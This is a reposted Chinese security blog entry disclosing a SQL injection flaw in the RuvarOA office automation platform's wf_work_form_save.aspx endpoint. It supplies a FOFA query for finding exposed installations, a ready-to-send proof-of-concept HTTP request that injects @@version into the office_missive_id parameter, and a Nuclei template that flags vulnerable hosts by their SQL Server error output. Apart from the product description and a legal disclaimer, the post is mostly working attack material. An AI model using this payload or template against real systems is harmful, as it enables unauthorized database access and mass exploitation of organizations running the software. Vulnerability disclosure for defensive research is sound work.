RuvarOA wf_work_form_save SQL注入漏洞

admin
admin
admin
138876
文章
114
评论
2024年7月15日17:28:17评论36 views字数 1059阅读3分31秒阅读模式

0x01 漏洞简介

RuvarOA办公自动化系统是广州市璐华计算机科技有限公司采用组件技术和Web技术相结合,基于Windows平台,构建在大型关系数据库管理系统基础上的,以行政办公为核心,以集成融通业务办公为目标,将网络与无线通讯等信息技术完美结合在一起设计而成的新型办公自动化应用系统。这个系统在/WorkFlow/wf_work_form_save.aspx接口被发现存在SQL注入漏洞。

RuvarOA wf_work_form_save SQL注入漏洞

0x02 漏洞详情

 

fofa:app="RuvarOA协同办公平台"

 

Poc:

GET /WorkFlow/wf_work_form_save.aspx?office_missive_id=@@version HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33Connection: close

RuvarOA wf_work_form_save SQL注入漏洞

0x03 Nuclie

id: RuvarOA-wf_work_form_save-sqli
info:  name: RuvarOA-wf_work_form_save-sqli  author: yunkong  severity: high  description: RuvarOA wf_work_form_save SQL注入漏洞  tags: RuvarOA,sqli
http:  - raw:      - |+        GET /WorkFlow/wf_work_form_save.aspx?office_missive_id=@@version HTTP/1.1        Host:         User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5807.225 Safari/537.36 Edg/112.0.1791.33        Connection: close
    matchers-condition: and    matchers:      - type: binary        part: body        binary:          - 20e580bc20274d6963726f736f66742053514c20      - type: status        status:          - 500

RuvarOA wf_work_form_save SQL注入漏洞

 

 

 

原文始发于微信公众号(贫僧法号云空):RuvarOA wf_work_form_save SQL注入漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月15日17:28:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   RuvarOA wf_work_form_save SQL注入漏洞https://cn-sec.com/archives/2779794.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息